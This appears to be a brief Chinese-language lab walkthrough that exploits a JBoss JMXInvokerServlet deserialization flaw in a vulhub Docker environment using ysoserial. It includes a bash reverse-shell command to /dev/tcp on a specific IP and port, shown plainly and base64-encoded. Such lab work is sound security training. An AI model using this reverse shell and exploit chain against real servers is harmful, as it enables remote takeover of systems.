1.环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
2.漏洞验证
http://47.121.211.205:8080/invoker/JMXInvokerServlet
如果有文件下载 说明存在
3.使用ysoserial工具进行漏洞利用
将反弹shell进行base64编码
bash -i >& /dev/tcp/47.121.211.205/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMjExLjIwNS82NjY2IDA+JjEK
4.反弹成功